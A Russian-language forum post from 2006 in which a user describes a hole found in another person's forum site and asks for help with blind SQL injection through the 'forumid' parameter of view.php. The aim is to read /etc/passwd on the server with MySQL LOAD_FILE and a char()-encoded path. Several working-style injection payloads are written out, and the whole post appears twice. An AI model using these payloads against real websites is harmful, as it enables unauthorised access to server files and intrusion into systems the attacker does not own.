cop
14.11.2006, 21:34
Нашел дырочку в одном из форумов, который судя по всему написан автором сайта.
Пытаюь проверить на существования файлы на сервере ну и потом перебором получить содержимое. К примеру /etc/passwd.
Вот как это выглядит:
view.php?forumid=1 AND -11 < (SELECT ascii(substring(LOAD_FILE(char(47,101,116,99,47,11 2,97,115,115,119,100)),2,1)) FROM dayx_users LIMIT 1) /*
Воспринимается подзапрос как ложь. Т.е. всеравно что бы я написал
view.php?forumid=1 AND 1 = 0 /*
уже пробовал и так
view.php?forumid=1 AND -11 < (SELECT CONCAT(1,ascii(substring(LOAD_FILE(char(47,101,116 ,99,47,112,97,115,115,119,100)),2,1))) FROM dayx_users LIMIT 1) /*
всеравно не срабатывает.
ЧТо может быть с этим оператором LOAD_FILE ?
Да, если ввожу как параметр в LOAD_FILE любое значение, то всеравно ноль реакции.
Пытаюь проверить на существования файлы на сервере ну и потом перебором получить содержимое. К примеру /etc/passwd.
Вот как это выглядит:
view.php?forumid=1 AND -11 < (SELECT ascii(substring(LOAD_FILE(char(47,101,116,99,47,11 2,97,115,115,119,100)),2,1)) FROM dayx_users LIMIT 1) /*
Воспринимается подзапрос как ложь. Т.е. всеравно что бы я написал
view.php?forumid=1 AND 1 = 0 /*
уже пробовал и так
view.php?forumid=1 AND -11 < (SELECT CONCAT(1,ascii(substring(LOAD_FILE(char(47,101,116 ,99,47,112,97,115,115,119,100)),2,1))) FROM dayx_users LIMIT 1) /*
всеравно не срабатывает.
ЧТо может быть с этим оператором LOAD_FILE ?
Да, если ввожу как параметр в LOAD_FILE любое значение, то всеравно ноль реакции.